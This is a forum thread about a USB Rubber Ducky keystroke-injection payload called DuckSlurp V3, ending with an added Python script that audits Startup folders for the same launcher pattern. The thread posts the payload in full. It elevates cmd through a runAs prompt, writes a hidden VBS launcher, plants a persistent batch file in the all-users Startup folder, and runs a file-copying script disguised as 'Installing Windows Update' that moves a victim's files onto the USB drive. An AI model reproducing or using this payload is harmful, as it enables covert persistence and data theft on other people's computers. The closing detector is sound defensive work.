Cripticlord Posted March 30, 2015

I just had an idea that came from one of the Hak5 episodes about the Ducky. Darren mentioned something about having the DuckyWait.bat always running so you could just come by and plug in the DUCKY USB (not the actual Ducky) and it would copy all of the files you told it to without running the Ducky every time. From what I can see it would only take one change in the coding of DuckSlurp V2.

REM *** Change directories because System32 appears to be protected. ***
STRING CD %TEMP%
ENTER

Just change "%TEMP%" to "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" and it will create the DuckyWait.bat in the startup folder, so every time the computer is restarted, so is the DuckyWait.bat. What do you guys think?
overwraith Posted April 21, 2015

I suppose you could use the firmware which only runs when you tap the button, thereby only running the payload when you actually need to. You could also put an if statement in duck slurp which prevents overwriting the duck slurp payload if it already exists (I would kill for a ducky case which has a button on it so I didn't have to take it out of the case every time I wanted to tap the button). The if statement wouldn't be surreptitious though if you wanted to plug in the duck while the user was looking.

Now the problem with moving a batch file to the start-up folder is that you cannot tell the batch file to run invisibly; Windows automatically runs everything in the start-up folder. What is needed is some indirection whereby the duck slurp is somewhere else, and only a small start-up command is present in the start-up folder. The "invis.vbs" call and "wscript.exe" need to be included in whatever batch file is resident there. If there was only one batch file in the start-up folder then you would essentially have a black box (DOS box) appear at start-up, then exit itself or something. I would have to do some tinkering to see if this would work. The problem is you have to be very specific in order to make batch files run silently on Windows Vista/7.
overwraith Posted April 21, 2015 (edited)

Better make it V3. The following should work. So a cmd window will pop up on reboot, but it exits almost instantly, kicking off the batch process. You could do the same thing with registry keys, and one less file, but I think this way there are fewer assumptions about having admin access.

REM Author: overwraith modified by dkitchen
REM Name: DuckSlurp_V3.txt
REM Purpose: Duck Slurp payload, copy files off of the host computer.
REM Encoder V2.4+
REM Using the run command for a broader OS base.
REM *** Initial Delay ***
DELAY 2000
REM *** Bypass UAC ***
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
REM *** Change directories because System32 appears to be protected. ***
STRING CD %TEMP%
ENTER
REM *** Delete wait batch file if already exists ***
STRING erase /Q DuckyWait.bat
ENTER
REM *** Make batch file that waits for SD card to mount. ***
STRING copy con DuckyWait.bat
ENTER
STRING :while1
ENTER
STRING @echo off
ENTER
STRING :while1
ENTER
REM *** Find the DUCKY drive ***
STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do (
ENTER
STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
ENTER
STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
ENTER
STRING )
ENTER
STRING )
ENTER
STRING if [%DuckyDrive%] EQU [] (
ENTER
STRING timeout /t 3
ENTER
STRING goto :while1
ENTER
STRING ) else (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 3
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
STRING set DuckyDrive=%DuckyDrive%\DuckSlurp\
ENTER
STRING Start %DuckyDrive%\DuckSlurp.bat
ENTER
CONTROL z
ENTER
REM *** Delete Invisible vbs file if already exists ***
STRING erase /Q invis.vbs
ENTER
REM *** Make VBS file to run invisibly ***
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM *** Change directories to startup folder ***
STRING cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
ENTER
REM *** Delete program start if already exists ***
STRING erase /Q SlurpStart.bat
ENTER
REM *** Make batch file that starts from the startup folder ***
STRING copy con SlurpStart.bat
ENTER
REM *** Run the batch file invisibly ***
STRING start wscript.exe %TEMP%\invis.vbs %TEMP%\DuckyWait.bat >>nul
ENTER
STRING exit
ENTER
CONTROL z
ENTER
REM *** Start the slurp program ***
STRING SlurpStart.bat
ENTER
REM *** Exit ***
STRING EXIT
ENTER

Here is the DuckSlurp.bat file which should reside on your exfil drive.

@echo off
@echo Installing Windows Update
set destination=%~d0\DuckSlurp\%COMPUTERNAME%
mkdir %destination%
if Exist %USERPROFILE%\Documents (
xcopy %USERPROFILE%\Desktop\EvilPlans %destination% >>nul
)
@cls
@exit

Of course you would substitute the directory path with the files you would like to copy off the computer, perhaps a loop which loops through the directories, copying certain extensions etc.

PS. This version has the DuckSlurp.bat file running so that it can be seen, so that you know when all the files are done copying. Replace this line " STRING Start %DuckyDrive%\DuckSlurp.bat " with this one " STRING wscript.exe %TEMP%\invis.vbs %DUCKYdrive%\DuckSlurp.bat " to make it silent again (remove outer quotes).

Edited April 21, 2015 by overwraith
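As an added defender-side example, not code from this thread or from the DuckSlurp payload: a Python audit over a constructed inventory of Startup-folder files that flags the launcher pattern the post above describes, a small .bat in a Startup folder that hands a %TEMP% script to wscript.exe through a VBS wrapper whose Run(..., 0, ...) hides the window. The file paths and contents in SAMPLE_STARTUP are constructed samples, and the function names are my own.

```python
"""Flag Startup-folder batch files that launch a hidden script via a VBS wrapper."""
import re
from pathlib import PureWindowsPath

# Constructed inventory (path -> content) mirroring the thread's SlurpStart.bat / invis.vbs,
# plus one benign backup script that must not be flagged.
SAMPLE_STARTUP = {
    r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SlurpStart.bat":
        "start wscript.exe %TEMP%\\invis.vbs %TEMP%\\DuckyWait.bat >>nul\r\nexit\r\n",
    r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Backup.bat":
        "@echo off\r\nrobocopy D:\\work \\\\nas\\share /MIR\r\n",
    r"C:\Users\alice\AppData\Local\Temp\invis.vbs":
        'CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False\r\n',
}

SCRIPT_HOST = re.compile(r"\b(wscript|cscript)(\.exe)?\b", re.I)
HIDDEN_RUN = re.compile(r"\.Run\s*\(?.*?,\s*0\s*,", re.I)   # WshShell.Run(cmd, 0, ...) = hidden
STAGING_DIR = re.compile(r"%TEMP%|%APPDATA%|%LOCALAPPDATA%|\\Temp\\|\\AppData\\", re.I)

def audit_entry(path: str, content: str) -> list[str]:
    """Return reasons one file (a .bat or the .vbs it references) looks like a hidden launcher."""
    reasons = set()
    for line in content.splitlines():
        if SCRIPT_HOST.search(line) and STAGING_DIR.search(line):
            reasons.add("launches a script host on a file in a user-writable staging dir")
        if SCRIPT_HOST.search(line) and re.search(r"\.vbs\b", line, re.I):
            reasons.add("passes a .vbs wrapper to a script host")
        if HIDDEN_RUN.search(line):
            reasons.add("VBS Run() with window style 0 (hidden window)")
    return sorted(reasons)

def audit_startup(inventory: dict[str, str]) -> dict[str, list[str]]:
    """Audit every .bat/.cmd that sits in a Startup folder; follow referenced .vbs files by name."""
    findings = {}
    for path, content in inventory.items():
        p = PureWindowsPath(path)
        if p.suffix.lower() not in (".bat", ".cmd") or p.parent.name.lower() != "startup":
            continue
        reasons = set(audit_entry(path, content))
        for ref in re.findall(r"[\w%\\.-]+\.vbs", content, re.I):
            ref_name = PureWindowsPath(ref).name.lower()
            for other, other_content in inventory.items():
                if PureWindowsPath(other).name.lower() == ref_name:
                    reasons.update(f"{ref_name}: {r}" for r in audit_entry(other, other_content))
        if reasons:
            findings[p.name] = sorted(reasons)
    return findings

if __name__ == "__main__":
    for name, reasons in audit_startup(SAMPLE_STARTUP).items():
        print(name, "->", "; ".join(reasons))
```

On a live host the inventory would be built by reading both the per-user (%APPDATA%) and all-users (ProgramData) Startup folders, which together cover the placement proposed in the first post and the one used in V3.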